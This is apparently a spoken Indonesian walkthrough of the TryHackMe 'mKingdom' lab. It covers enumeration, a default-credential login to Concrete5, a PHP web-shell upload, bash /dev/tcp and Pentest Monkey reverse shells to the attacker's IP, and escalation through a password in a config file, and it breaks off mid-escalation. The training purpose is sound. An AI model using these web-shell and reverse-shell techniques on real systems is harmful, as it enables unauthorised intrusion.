Oke, selamat pagi semua. Kali ini kita coba untuk bermain lagi di sini. Kita di sini bermain sambil belajar untuk mengetahui tentang dunia cyber security. Kita menambah pengetahuan di sini. Tujuannya ya bukan untuk merusak ataupun tujuannya untuk eh, menjadi hacker. Di sini saya cuma untuk belajar, sekedar melepaskan hobi. Oke, di kali ini saya coba memberitahukan satu room baru ya. Ini ada room baru di Try Hack Me. Kita ikutin saja. Sebenarnya saya sudah menyelesaikan room ini beberapa hari yang lalu. Saya ada cuma untuk walkthrough-nya saja, untuk apa tahu teman-teman ada yang ingin atau yang belum menjalankan. Ini levelnya easy ya, tapi saya nge-rate-nya ini kemarin itu ke levelnya itu medium. Nah, di sini level easy ini saya sudah menyelesaikannya. Jadi di sini saya cuma untuk berbagi aja bagaimana caranya. Di sini misalnya kita coba untuk nge-start mesinnya dan kita ingin mendapatkan dua user ini ya, user txt dan root txt. Ini flagnya gitu. Nah, di sini di room ini ada yang sedikit menarik sih. Saya itu sebenarnya sudah menyelesaikannya itu di hari apa ya, dan sepertinya sudah ada write up juga yang belum ada write up yang diselesaikan. Nah, di sini di room ini kita akan belajar mengenai web eksploitasi, di mana di situ kita akan coba enumerasi webnya dan belajar tentang Linux Privilege Escalation, di mana ada hal yang baru yang cukup menarik di Linux Privilege Escalation-nya. Di sini saya akan menggunakan Kali Linux saya. Jadi kita coba untuk masuk ke Kali Linux-nya. Saya menggunakan remote desktop ya dari host komputer saya. Jadi di sini ada ini. Nah, sebenarnya sih saya sudah mengerjakannya. Jadi kita coba di sini cuman untuk walkthrough saja ya. Semacam untuk walkthrough-nya itu gitu. Jadi saya coba pindah ke folder Try Hack Me. Sebenarnya kita sudah menyelesaikan mKingdom ini di folder mana ya? Oh, di sini kok nggak ada ya. CD mKingdom. Oh, nggak ada. Oke. Nah, di sini saya coba untuk kalkulasi aja. Di sini saya akan menerangkan beberapa hal. Yang pertamanya itu adalah kita coba lihat vStudio kita. Jadi saya coba vim/etc/host ini untuk meredirect hostnya. Jadi kita coba lihat dulu itu si host saya. Nah, ini kayaknya ada yang airplane di yang sebelumnya. Kita coba hapus saja yang airplane. Nah, kita coba bersih dan kita coba connect ke VPN Try Hack Me. Yang belum punya Open VPN Try Hack Me atau baru daftar, mungkin bisa langsung ke Try Hack Me-nya, daftar di sini. Nanti dia ada di akses ini ya, di profile ini misalnya ada. Oh, ini bug nih, bug atau isu ini ya sih. Dia jadi di atas ininya. Ini mau kita laporin, kayaknya di overlay sama mereka di ini. Jadi mission bosnya di overlay sama si ini mesin terminating gini. Nah, di sini di profile itu kalau nggak salah di akses ya. Di akses ini kita kalau untuk mau dapetin Open VPN-nya bisa download di sini, dan coba pastikan dulu dia di server mana ya. Kalau saya itu di Euro 3. Agak sedikit lambat sih, tapi ya di situ koneksinya stable, dan kita ini sudah connect di IP ini ya, 10.21.733. Nah, ini IP kita. Kalau IP ini 10.21.733 ini bisa kita lihat di sini ya. Saya coba bukaan satu terminal. Di sini saya coba bikinkan namanya VPN, dan saya coba buka satu terminal lagi.
Sini kita coba IP A Southern 0. Nah, ini IP-nya 10.21.733, atau yang langsung udah punya klien sih bisa terlihat di sini ada connect VPN, di sini ada IP-nya. VPN IP. Install Xscript to copy to clipboard. Nah, oke. Yang pertama kali kita lakukan di mesin ini adalah seperti biasa kita melakukan enumerasi. Ini seperti testing black box ya. Jadi kita cuma diberikan satu IP atau domain. Yang pertama kali kita lakukan itu adalah kita melihat saya coba bikinkan satu folder. Kok CD sih? Dimana Kyongdom, bukan Kingdom. Nah, jadi kita coba CDKM Kingdom. Nah, pertama sekali itu yang kita lakukan itu adalah kita akan melakukan enumerasi ya. Enumerasi terhadap si server itu. Nah, saya coba untuk bikin, misalnya kita bikin di sini export IP sama dengan Ctrl+Shift V. Jadi IP-nya itu biar ketanam langsung di kita. Jadi kita bisa bikin misalnya kita echo $IP, dia langsung nyatet ini. Jadi kita enak nih. Jadi kita bisa bikin nmap -sc -sv di sini. -sc itu melakukan script test dan untuk script vulnerability, S-nya huruf kecil ya. Dan kita langsung lakukan IP-nya tadi. Nah, kita bikin -v untuk menampilkan purpose-nya. Kita bisa melihat port berapa saja yang terbuka di server tersebut. Nah, di sini kita melihat nih ada discovered open port 85. Nah, ini nanti akan dicek dia itu menggunakan apa sih port itu gitu. Port 85 itu dia pakai apa nih? Nah, di sini kita bisa lihat, oh no, Pwnet again. Nih, ini titel si websitenya nih. Jadi ini dia menjalankan Apache HTTP 247. Di sini kita tahu kayaknya ini servernya kehack ya, atau ini kayaknya karena titlenya dia udah berubah nih. Nah, kita nggak tahu juga ini. Dan di sini kita mendapatkan port 85. Nah, jadi kita harus melakukan enumerasi atau kita coba cari tahu ada apa sih di port 85 ini. Nah, coba itu dari port 85 ini kita bisa lihat nih di websitenya ada apa sih, udah terbuka di port 85 ini. Saya coba buka pakai Firefox. IP-nya itu di port. Jadi kalau pakai IP itu pakai port, kita pakai .2. Nah, portnya port berapa gitu. Nah, ini dia. Jadi ini websitenya itu ke pound di sini, dan kita bisa lihat ini view page source-nya itu ada apa sih. View page source-nya itu sepertinya kita cuma ada image 1. Nah, kita bisa lihat-lihat nih, misalnya kalau mau stenografi itu di gambar ini bisa kita copy image link. Nah, kita bisa kalau mau ngeliat stenografi, kita bisa melakukan get pastikan tadi link yang kita download, yang kita kopikan tadi, copy image link tadi ya. Jadi pastikan di sini. Ketika kita widget, kita dapat filenya itu namanya img1. Kita bisa menggunakan EXIF tools untuk melihat file itu apa sih gitu, img1. Nah, jadi kita bisa lihat di sini ada kreatornya itu si browser gitu, misalnya kita bisa lihat di sini. Nah, jadi yang pertama-tama sekali kita lakukan itu adalah kita tahu ada yang terbuka cuma port 85 ya, nggak ada port yang lain. Jadi sambil ngopi ya, di port 85 ini kita lakukan apa lagi nih? Kalau kita sudah melakukan checkingnya itu, jadi kita sudah melakukan cek nih di dalam IP ini, IP yang tadi kita lihat, kita tahu bahwa dia membuka port website itu di 85. Nah, setelah itu websitenya kita
websitenya itu telah terkena satu serangan hacking dan di device. Tugas kita itu untuk melakukan enumerasi. Jadi enumerasi di foldernya ini, karena aplikasi itu menggunakan folder, jadi kita coba scan di webnya itu tadi. Kita coba menggunakan, saya akan coba menggunakan Dear Search. Menunya itu kita kopikan aja tadi si linknya ini ya. Ini kita kopikan, terus kita pastikan ke sini. Ctrl V. Nah, sebenarnya dari Dearbuster itu kalau kita enter di sini, dia sudah ada wordlist sendirinya gitu. Dan dia akan membuat laporannya itu ke file output file ini. Jadi kita bisa cek nih underscore di folder kita itu di mkingdom itu ada ini gitu. Nah, di sini dia ada lihat nih. Ini 403 berarti 403 itu forbidden ya istilahnya. Jadi kalau kita coba untuk akses ke situ juga dia ada, cuman responnya itu 403, jadi forbidden. Contohnya kita akses di htswr.txt ini. Saya coba copy, saya coba pastekan di ininya, /Ctrl V. Nah, kita akan mendapat 403 nih, forbidden tadi bilang. Nah, jadi ini websitenya itu. Nah, coba kita perhatikan lagi di sini apakah ada directory lain yang jalan gitu. Nah, ini ada yang 200 masuk ke 200 itu berarti dia sukses ya. 200 itu sukses terbuka, itu respon code. Untuk lebih tahunya respon code di HTTP itu bisa di googling aja, respon code HTTP gitu. Ada 500, ada 300, ada 403. Nah, di sini 200 ini kita di redirect ke app slash gitu. Dan jadi dia nge-redirect. Jadi kalau kita buka app, ada satu websitenya gitu, /app. Di sini saya coba ketikkan /app dan kita ada masuk ke sini, akses. Nah, dia ada satu button aja jump gitu loh. Jadi kalau kita lihat di sini, kita view page source. Tadinya kita cuma tahu ada port 85 di situ yang ada websitenya yang ke device. Nah, sekarang kita tahu nih ada directory /app yang mungkin ini index.php atau index.html atau apa, saya nggak tahu. Nah, di sini kita lihat di foldernya itu ketika diklik jump, dia akan melakukan button klik, dimana dia akan nge-redirect kita ke Castle. Nah, di Castle ini kalau kita klik berarti dia akan ngedirect /Castle, jadi dia akan nambahin ke Castle. Nah, coba kita klik make yourself comfortable and enjoy my place. Oke. Nah, kita oke. Nah, di sini akan URL-nya berubah ke Castle seharusnya, karena agak sedikit lambat ya ini API-nya. Nah, di sini kita ngetahuin ada beberapa. Yang pertama itu kita tahu ada Toad sebagai usernya. Di sini websitenya si Toad. Kita bisa bikin catatan, sebenarnya di sini ada username Toad nih kita dapatkan, dan terus di sini kita itu harus mencari, ini dia ada blog dan ada kontak. Nah, di sini ini kita bisa melakukan beberapa enumerasi atau beberapa tahu. Yang satu itu dia menggunakan concrete, built-in concrete 5 concrete atau ini dia ada ini. Dan di sini ada button login. Nah, di sini kita sudah nambah beberapa enumerasi kita yang untuk mengetahui tentang website ini. Di antaranya ada blog. Di si blog ini kita nggak tahu ini blog apa, dan dia menggunakan CMS Concrete 5 yang mungkin ada vulnerable-nya. Nah, coba kita lihat, karena dia di sini ada build with Concrete 5 CMS dan ada login page-nya. Nah, kita bisa cek dengan Concrete 5 exploit. Nah, kita cari exploitnya apa sih. Nah, di sini Concrete 858 54
Concrete 5 vulnerability. Nah sini CMA juga banyak nih, expect injection. Nah kan kita cuma tahunya Concrete 5 versinya kita itu kita nggak tahu. Nah di mana kita dapat versinya itu? Apakah mungkin dari sininya, dari sertifikatnya? Kayaknya tidak punya sertifikat, dan kita coba lihat di Concrete 5 ini, kita coba view page source. Mungkin ada yang memberitakan. Di sini kita bisa dapat nih ya. Saya coba zoom in. Apakah bisa di zoom in? Nah, di sini kita bisa lihat meta generator Concrete, kontennya itu menggunakan Concrete 5852. Nah, kita bisa copy aja sih sebenarnya. Ini kita copy. Terus di sini kita cari sebagai exploit kita. Nah, jadi kita coba Ctrl V 852 exploit itu ada apa nih? Ini dia ada RCE nih, remote code execution. Remote code execution ini sangat berbahaya ya. Jadi remote code execution itu sangat berbahaya karena dia RCE dan dia sudah bisa melakukan eksekusi kode yang secara remote gitu. Nah ini yang berbahaya gitu. Jadi kalau udah masuk RCE itu udah harusnya level ininya sudah high ya, paling tidak medium itu udah paling serem sih kalau menurut saya. Nah dimana kita melihatnya ini, coba kita lihat ini di Vulners. Di exploit DB juga ada sepertinya. Ini exploit DB nya apa nih? XXS store web exploit. Ini di XXS 85 par apa nih? Deserialization. Ini dia Concrete 5 ini sudah RCE sih. Kita coba lihat di Vuln ini dia pakainya sih mana sih. Di vulners.com ini dia seperti apa sih. Nah kita lihat reverse shell. Nah ini dia sudah bisa dari file manager. Berarti kalau tidak, paling tidak kita harus bisa login di situ gitu. Nah yang menariknya di room ini adalah ketika kita dapatkan login page di sini, di sini ini menarik ya. Jadi yang biasanya yang harus kita lakukan ketika melihat kode melihat login form kayak gini atau form untuk authentication, otomatis para hacker itu akan memilih user yang mempunyai privilege tinggi. Di antaranya itu adalah admin atau administrator. Nah, jadi kita bisa mencoba admin dengan passwordnya itu admin. Itu yang untuk yang paling kecilnya. Jadi admin. Kita tes dia apakah login. Nah, di sini sepertinya invalid ya. Invalid username dan password. Nah, di sini kalau error message di sini juga ini harus hati-hati ya sebagai web developer. Jangan kita mengatakan bahwa invalid password karena username-nya sudah ada gitu. Jadi passwordnya salah nih. Sebenarnya sih bagus untuk message-nya. Jadi kita si user itu lebih dipermudahkan bahwa yang salah itu password saya. Tetapi bagi hacker itu satu trik yang bisa dilakukan untuk brute force. Oh, ini berarti username-nya ada nih. Dia tinggal nge-brute force si password. Ketika username not found, kalian bikin di sini errornya nggak ada passwordnya, berarti dia akan nge-brute force dulu si username-nya gitu. Mana nih username yang ada gitu. Dia akan coba-coba username yang bermacam-macam gitu, dan username itu ada listnya gitu. List username itu ada tersebar di password di internet banyak gitu, di checklist gitu. Dan passwordnya itu juga banyak. Nah, yang menarik itu di sini itu apabila kalian salah berapa kali di memasukkan password itu, kalian akan keblok IP-nya. Dan saya terkenal sekali di sini sehingga saya membatalkan misinya di sini. Jadi saya coba untuk terminate mesinnya, terus hidupin lagi untuk dia restart lagi itu istilahnya gitu. Jadi dapat IP baru lagi. Nah, ini kalau nggak salah itu ada 3 kali atau apa, karena saya coba langsung brute force. Padahal yang pertama-tama itu kita melakukannya itu dengan
admin tadi gagal, kita coba admin password. Nah di sini ini biasanya kelemahan dari developer yang mencoba-coba untuk menginstal gitu. Jadi mencoba menginstal itu dia belum tahu CMS ini, jadi belum tahu menginstal ini, dia coba langsung bikin ya udah admin password. Nah password, nah ketika diklik login dan ternyata kita di sini langsung di redirect ke page dashboardnya gitu. Nah itu yang sangat vulnerable kalau saya bilang ya. Jadi kita coba admin tadi gagal. Nah kalau yang password weak itu seperti admin password 123, admin password 1, atau admin P besar Akeong WOO0 RD. Nah itu sangat mudah sekali untuk di crack ya, karena sudah ada di listnya gitu. Saya bisa contohkan untuk melihat di listnya itu password yang bisa di crack itu. Contohnya nih saya punya di /user share wordlist rockyou. Nah ini di Kali Linux ini udah ada gitu, udah terbawa bahwa dia ini ada gitu. Misalnya kita coba cat aja ya. Nah saya coba rockyou.txt ini berapa banyak sih list password yang ada di rockyou ini? Ada 14 juta karakteristik random password, 14.300.000 ini password yang ada di dalam list itu gitu. Jadi kalau misalnya saya coba masukin password, ada nggak dia? Kita coba grab password. Nah dia ada nih, banyak nih password tuh. Password yang model gimana udah ada ini, password 1, password 123, tanda seru di depannya juga dia ada. Password 1 ada, password juga ada. Nah ini macam-macam password nih, yang bintang-bintang titik-titik password ini, no password ini juga ada kan segala dicoba sama dia nih, yang ada passwordnya gitu. Rocky password ini no, sampai segede ini juga dia dapat nih, your password email sampai yang begini juga dia ada listnya di dalam di situ. Jadi kalau dibikin crackingnya juga bisa gitu. Contohnya nih ya, jadi kalau kayak ini kalian bikin my password ini, nah ini sebentar ini tercrack ini sama rockyou. Nah gitu ya. Nah, kita lanjut lagi. Saya coba clear. Di sini kita sudah masuk ke dashboard adminnya, dan ini sangat berbahaya sekali kalau kita coba udah bisa masuk ke sini ya. Kita bisa coba untuk upload satu file. Misalnya di sini kita coba files. Kita coba upload file PHP untuk melakukan code execution. Nah, kita coba upload satu file. Nah, kita coba upload simple file aja. Saya coba klik di sini. Saya ada file PHP itu, saya coba bikin aja deh di desktop. Dia di home, try hack me mkingdom, mana mkingdom. Nah ini di sini saya coba upload satu file PHP ya. Saya coba bikin satu file PHP itu yang simple aja. Kita coba vim dodol.php. Di sini kita coba masukkan script PHP. Nah, nih coba kita bikin script PHP yang paling simpel itu. Misalnya kita echo system underscore $_request, yang mana kita bisa minta request parameternya itu mau get mau post juga bisa. Jadi kita bisa pakai get. Ini saya coba save. Nah di sini kita sudah ada folder file namanya dodol.php ya. Nah di sini kita coba cat dodol.php. Ini isinya seperti ini. Nah kita bisa upload itu di servernya. Nah begitu kita upload mungkin akan ada error di sini merah ya.
invalid file extension dibilang. Nah di sini ketika invalid file extension, kita coba di konkret ini ada vulnerable-nya itu karena kita bisa nge-setting bahwa variabel apa yang bisa kita masukkan ke sini gitu. Nah contohnya itu kita bisa file extension itu di mana ya, allow file types. Nah di sini file ini, terkait file ini dia bisa allow file types. Di sini ada flv, jpeg, gef, doc action apa segala macam nih. Nah kita bisa tinggal tambahkan koma php save. Yang tadinya kita uploadnya itu gagal, ketika kita sudah ini allow file type-nya sudah di save, sekarang kita coba upload ulang lagi. Nah si filenya itu ketika kita coba drop here, kita coba .php, dia akan nge-upload nih. Nah ketika hijau tadi merah ya, nah di sini dia hijau udah sukses. Nah kita tinggal close aja nih, close, dia akan ngasih tahu ini folder ada di mana yang udah berhasil diupload tadi gitu. Nah ini, jadi kita sudah bisa mengaksesnya itu di sini di foldernya ini. Ini yang satu kita copy linknya aja. Ini satu yang kurang bagus ya menurut saya. Kalau bisa sih nama file yang diupload dari klien itu jangan kita bikinkan sebagai URL langsung, mungkin bisa di tambahkan seperti MD5 atau apa. Nah, jadi ketika kita di sini kita akses filenya tadi, URL-nya tadi, dan kita kan ada parameter tadi yang saya bikin itu C. Jadi saya coba bikin C sama dengan who am I. Seharusnya kita sudah dapat nih who am I-nya itu www data. Nah, di sini aja kita sebenarnya sudah bisa bikin satu script untuk injection, dan kita sebenarnya nggak perlu script. Kalau di sini aja kita coba, saya bikin coba ls, dia akan melihat nih bahwa di folder itu ada file ini. Saya coba ls slash di rootnya, ini kita udah dapat nih. Nah, saya coba buatkan satu file script di sini. Coba saya buka code Visual Studio Code di sini untuk mempermudahkan kita. Di sini kan kita udah injection nih, udah dapat nih command injectionnya di sini. Nah, saya coba bikin satu file misalnya exp atau exploit.py. Kita coba bikin di sini simple aja ya. Misalnya import, saya coba bikin /user di sini namanya environment bin Python. Nah, kita coba import request atau from request import everything. Nah, di sini kita enaknya agak ini. Kita coba kita Ctrl S, Ctrl save, terus kita bikin di sini URL sama dengan kita pastikan aja tadi URL ininya apakah tadi masih ini. Nah, ini URL-nya, dan kita coba C dan datanya C sama dengan gitu. Nah, kita coba bikin di sini comment sama dengan ID. Nah, jadi kita bisa while misalnya kita bikin di sini while cmd tidak sama dengan exit, kita bisa bikin cmd sama dengan input saya coba ini cmd komennya apa, terus kita coba get URL
plus cmd. Nah, ini kita bikin di sini. If cmd, kita coba batasin ya. Kalau ini if cmd tidak sama dengan exit, dan di sini kita coba bikin komennya ini misalnya while true aja, while true. Nah, kalau dia exit kita break. Nah, kalau dia sama dengan exit ya. Nah, kalau terus kita bikin di sini requestnya sama dengan get ini, baru kita print requestnya. Print F. Saya coba agak percantik sedikit. Response r.text. Nah, jadi kita coba bikin di sini. Nah, saya coba jalankan ini. Kita sudah ada satu exploit. Kita coba dulu dengan menggunakan Python exploit.py. Komennya apa nih? ls-la. Nah, kita sudah dapat nih dodol.php nih. Bisa kita tekan ls slash. Nah, kita udah dapat nih ls slash home. Nah, ada nih Toad dan Mario. Nah, coba kita bikin satu koneksi. Di sini saya coba besarin. Saya coba bikin di sini nc min lvp port, misalnya kita bikin port 80 atau port 85 lah, atau ini untuk supaya dia siapa tahu ada antivirus atau apa gitu kan. Nah, di sini kita coba bikin ini namanya rci php. Di sini kita coba bikin namanya itu netcat 80. Nah, ini port 80 ya. Nah, kita coba cari reverse cell. Jadi kita coba lihat di sini reverse cell, yang dimana reverse cell ini untuk kita bisa mendapatkan satu koneksi balik ya, connection kembali ke kita gitu. Nah, di sini kita coba buka refcell.com. Nah, kita coba buka. Sebenarnya kita bisa langsung aja tadi nge-upload satu refcell, tapi RCE-nya di sini seperti ini. Saya coba mau bikinkan satu script aja untuk bisa injection-nya. Refcell.com-nya kok jauh banget sih. Domain seller 7,100. Coba cari dulu aja refcell, nggak usah pakai refcell.com, kayaknya bukan di refcell.com deh, atau di sini refcells. Ini dia yang benarnya nih, di sini di refcells dia pakai S ya. Sepertinya ini Visual Studio Code saya ini makan resource-nya besar sekali ya. Saya coba close aja ya. Jadi kayaknya agak sedikit lambat virtual ininya. Penuh resource-nya langsung. Atau si Firefox yang bikin penuh, saya nggak tahu deh. Lama sekali ini, lama sekali. Port 5000 apa pula buka port 5000 nih, saya maunya ke ini.
apa versi apa ribu gini. Kita coba rev cells. Ini dia ada nih. Nah, lambat sekali dia, penuh resource saya langsung bikin Firefox ini. Online reverser. Nah, di sini ada macam-macam reversal ya. Saya kurang hafal aja sih sintaksnya, itu bus means i atau apa gitu. Nah, di sini tadi kita kan udah bisa nih bikin ngasih perintah nih. Sebenarnya kita lihat aja di sini RCE-nya ini. Apakah ada which Python 3? Ada nih, Python 3-nya ada. Nah, terus kita bisa copy. Ini saya mau pakai bash. Jadi saya coba tinggal ini IP-nya coba diedit di 10.21.7.33. Kita tadi menggunakan port 80. Nah, ini kita coba copy dan coba kita jalankan di komen kita tadi. Copy. Nah, kita jalankan di RCE kita tadi. Nah, di sini kita pastikan Ctrl V. Coba kita enter. Dan kalau dia tidak ada dapat apa-apa atau bagaimana, kita coba lihat di sini belum terkoneksi. Dan kita coba bash min c tanda petik Ctrl V tanda petik lagi, dan coba kita enter. Dan kita coba lihat di netcat kita, sepertinya tidak koneksi juga. Kenapa ya? Bash min c sh min a. Ctrl V up nggak bisa. Ctrl V. Waduh, harusnya sih bisa ya. Apa dia ada encoding ini ya? URL encoding kali ya, encoded URL, karena kita nyombanya dari URL ya. Jadi kita coba harusnya sih bisa nih. Bash min c, komennya apa, terus kita coba bash min i echo port 80 nggak mau. Gimana kalau kita coba di port 1337 dan kita coba kontrol bash min c bash min bash min i. Kayaknya ini sih yang bikin dia jadi ini /dev/tcp /10.21.7.33/1337. Semua outputnya kita keluarkan di background. Kita coba enter. Oke, sepertinya tidak mau. Coba ininya kita copy. Kita coba tembak langsung dia melalui sini. Nah, harusnya sih dia muter-muter nih. Jadi nggak selesai, dia sungguh selesai nih ls min la nih tadi. Komennya kita coba Ctrl V di sini.
baru kita enter. Kita lihat di sini kalau dia ini apakah masuk ke ref cell kita, di netcat kita. Nggak masuk juga, nggak masuk ya. Oke, kalau begitu kita coba upload satu PHP reversal. Agak sedikit lama. PHP ada reversal PHP kah? Harusnya sih ada ya. Nah, ini PHP, coba kita lihat. PHP open atau nggak ada ininya. Pentest Monkey. Nah, ini Pentest Monkey ini lebih bagus sih kalau PHP Pentest Monkey. Di sini kita coba ganti portnya, nanti di port ini copy aja port 1337. Terus kita coba bikinkan dia di satu file. Kita coba buka ini, jadinya lah Ctrl Alt Shift S, kita ganti di sini netcat 1337. Terus di RCE nya ini kita coba buka exit untuk keluar, clear, dan kita coba bikinkan vim ref.php. Kita insertkan tadi yang kita paste, escape W key. Terus kita coba vim ulang untuk memastikan ref.php. Nah, kita coba masuk ke line 2 pakai line 3 ya. Oh, bukan di portnya ini, kita ganti ke port listening kita tadi di 1337. Menggunakan vim kita insert dulu, ketik i 1337, baru kita escape titik 2 wiki tanda seru untuk force save dan quit, dan kita coba upload ulang. Ini di netcatnya nanti di sini. Saya coba bikin netcatnya ini di gimana caranya untuk dia ini menjadi di sebelah sini gitu, gimana caranya ya? Aduh, lambat sekali nih laptop. Ada apa yang terjadi di sini? Coba kita bikin di sini. Terus saya mau dia ini viewnya itu di sebelah gitu, maksud saya. Ctrl Shift ya. Udah di sini aja. Nah, kita coba upload tadi si ref.php kita tadi. Ini kok jadi begini ya? Kok jadi klik kanan sih? Loh, saya mau ke Firefox. Nah, ini coba kita close dulu nih, biar nggak terlalu banyak ininya. Astaga, resource-nya lambat sekali. Kayaknya XDE-nya terlalu kencang. Nah, mudah-mudahan ini bisa sedikit mempercepatnya. Oke, coba kita close di sini. Wow.
Please, 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 please. Apa ini? Apa ada yang coba untuk ini ya? Close tab. Astaga. Kok jadi klik kanan dia? Masa jadi harus nge-close Firefox sih? Coba kita close ulang dulu nih, semua Firefoxnya ini nggak jelas. Ya naon niki. Klik kanan juga loh dia. Sepertinya ada yang basah deh. Kita lihat dulu. Saya karena pakai trackpad ya, jadi mungkin ada ini. Nah ini kok jadi klik satu, saya mau kliknya satu bukan dua. Wah ada masalah nih dengan ininya. Sepertinya ini kepencet ya. Coba saat kita pakai Firefox ke Chrome. Nempel sepertinya tombol komen saya. Tadi page-nya itu di http:// ini kita masih punya waktu 1 jam 13 menit. Ctrl V di port 85/app/castle apa tadi? Citoat. Coba kita login lagi. Tadi admin password loginnya. Admin password lambat sekali. Nah di sini tadi kita sudah never. Coba kita cek lagi tadi sistem settingnya ini di allow file types-nya tadi sudahkah ditambahkan PHP sudah. Nah kita coba di files, kita upload lagi si ref.php yang tadi kita siapkan di home try hack me and kingdom ref.php. Nah ketika dia sedang masih upload, kita sudah pastikan kita sudah listening di port 1337 dan kita tinggal melakukan close di sini dan kita ada file ini dan kita cuman butuh open in new tab dan harusnya kita sudah mendapatkan ini. Nah ketika mendapatkan sel di sini harus buru-buru kita menstabilkan supaya nanti servisnya nge-close atau ini Ctrl C dia akan putus gitu. Jadi kita coba stabilkan terminal kita. Coba kita bikin clear di sini, dia nggak bisa nih karena termnya belum variable. Kita bikin sudo min l, kita nggak bisa nih karena bukan TTY gitu. Nah jadi kita coba menstabilkan itu dengan masukkan term dan TTY kita. Nah term itu caranya itu kita coba kita lihat di sini which Python 3, apakah dia mempunyai install Python 3. Nah di sini ada nih Python 3-nya. Nah kita coba bikin Python 3 min c untuk insert command. Kita bikin import
pty.spawn. Kita akan menggunakan bin bash. Saya lebih menggunakan bin bash karena lebih terlihat nih folder mana atau di mana gitu. Nah, kalau di sini kita sudah masuk sebagai pattern 3. Nah, di sini kita bisa bikin Ctrl Z untuk dia lari ke background. Ini kita akan nge-background kan si foldernya gitu. Nah, jadi kita coba bikin stty kita di sini. Raw min echo kita coba bikinkan. Terus kita bikin fg untuk dia kebuka lagi sebagai yang background ini jadi masuk ke foreground fg gitu. Nah, jadi kita sudah masuk lagi ke cellnya, cuman dia belum stabil. Kita coba bikin termnya ini kita masukkan gitu. Jadi kita export term sama dengan xterm. Nah, di sini ada macam-macam xterm ya. Saya cuma bikin xterm aja karena di saya itu sebenarnya saya nggak tahu nih. Coba kita lihat stty atau tty ya. Apa sih stty? Ini kan ada harusnya ini ya. Term echo $term. Nah, sebenarnya xterm saya itu xterm 256 color gitu. Color itu ya. Nah, kita sudah masuk di sini nih. Jadi kita sudah bisa ngetikkan clear. Nah, tadi kalau clear itu kita masukkan di sini, dia bilang term environment variable not set. Kita sudah masuk di sini. Nah, kita sudah masuk sebagai user ID www data ya. Grup ID-nya www data dan dia ada di web. Nah, gimana kita masuk sebagai si Toad? Yang pertama kita harus cek dulu di aplikasinya. Jadi kita coba aplikasi webnya tadi, kita coba lihat di var www.html. Kita listing di sini. Nah, ini image satu tadi yang bikin page-nya itu ke device gitu. Jadi kalau kita buka di sini misalnya 10 berapa tadi ini IP-nya. Kita coba copy dari sini aja. Ctrl V. Nah, ini tadi websitenya nih. Nah, jadi kalau kita mau benerin ini sebenarnya kita bisa benerin dia itu di sini gitu. Nah, di si index.html ini. Jadi kalau misalnya saya bikin echo center H1 Hengki Lodwig /H1 /center, kita akan menulis ini di index.html permission denied. Wah, tidak boleh kita menulis di sini. Berarti kita harus lihat dulu, cari dulu, naikin dulu privilege-nya. Kita coba ls-la. File si index ini milik siapa sih? Ternyata ini milik root. Kita tidak bisa nulis-nulis di sini gitu. Nah, kita harus menaikkan privilege kita di sini sebagai root. Pertama itu kita coba lihat ls-la di /home. Ada berapa user di /home? Nah, ternyata ada Mario dan Toad. Nah, di aplikasinya saya coba bersihin lagi. Di aplikasi ini kita coba masuk ke cd app. ls harusnya di castle lagi, cd castle ls cd application ls, dan kita coba ls-la. Di sini kita melihat ada folder config. Di mana sih membedakan folder di ls-la ini folder atau tidak? Nah, ini di sini. Kalau folder itu dia D depannya. Nah, kalau dia file itu biasanya pakai dash gini doang. Nah, jadi kita coba lihat di file config ini ada apa. Seharusnya sih ada configuration semacam. Kita coba cd ke config dan coba kita listing di sini ada apa. Nah, di sini
ada database connection. Nah, saya nggak tahu, kita mungkin ada settingan untuk masuk ke database ini. Jadi kita bisa cat database.php. Yang di sini kita bisa lihat database-nya mkingdom, username-nya Towat, dan kita bisa masuk sebagai sini Towat is the best. Kita bisa copy ini. Dan untuk menaikkan di sini karena tidak ada SSH, saya coba bikin di sini aja dulu ya. Tadi passwordnya itu echo Towat, Ctrl V sebagai user.txt. Nah di sini ada passwordnya ini si Towat ini. Coba cut user.txt ini Towat is the best. Nah coba kita copy. Nah di sini kita cuman perlu su Towat karena tadi ada si user Towat atau si Mario. Nah kita coba ke Towat, kita pastikan passwordnya tadi yang si Towat is the best. Nah di sini kita lihat perbedaannya nih. Di sini www.data dan di sini adalah Towat. Nah kita coba cd slash. Nah kita coba lihat UMI sekarang. Kita sebagai Towat. Towat di sini coba kita lihat di sini ID-nya itu kita dah Towat. Sementara tadi kita pakainya www.data ya. Nah kita sudah melakukan privilege escalation naik sebagai Towat. Nah apakah si Towat di sini ada menggunakan sudo? Kita coba lihat sudo min l. Kita pastikan passwordnya si Towat tadi. Nah ternyata user Towat tidak bisa menjalankan user kingdom. Nah kita harus cari find slash minperm slash 4000 untuk mencari file yang bisa kita lihat di sini 2/dev0 ini untuk tidak menampilkan error. Yang mencari, jadi di sini saya mencari di root itu semua file, jangan permisinya itu di yang filenya itu punya si root tapi bisa dijalankan oleh semua SID-nya, jadi bisa dijalankan semua user gitu sebagai ini. Nah di sini ada cat sih, cat ini tidak biasa sih sebenarnya. Nah ini sepertinya di sini karena saya sudah menyelesaikan ini, saya sedikit agak menghabiskan waktu yang lama untuk di sini /bin/cat ini. Saya nggak tahu Anda berhasil atau tidak di sini melakukan privilege escalation melalui cat di sini, tapi saya sendiri sih tidak melakukan itu. Saya karena sudah berapa banyak yang saya coba itu gagal semua gitu. Mungkin ada yang berhasil, bisa tinggalkan di komen. Nah, di sini untuk privilege escalation-nya kita harus naik lagi sebagai si Mario. Karena di usernya itu ada Mario tadi kan. Nah, cat di sini kalau kita bisa lihat ls-la/bin/cat ini permissionnya itu sebenarnya dia root nih. Nah saya nggak tahu root ini bisa nggak kita abuse, tapi kita kan nggak tahu nih si SSH-nya itu bisa apa tidaknya ke rootnya gitu. Nah gimana caranya untuk abuse root di sini? Saya nggak tahu juga sih. Apakah kita bisa cat si, coba ya, cat /etc/sudo permission denied juga gitu. Nah jadi yang saya lakukan itu adalah saya coba upload satu link piece. Misalnya di sini saya cd ke hack tools, jadi hacker trans tools, dan di sini saya coba clear. Nah di sini saya coba kasih namanya itu terminal aja deh, bukan KCE.
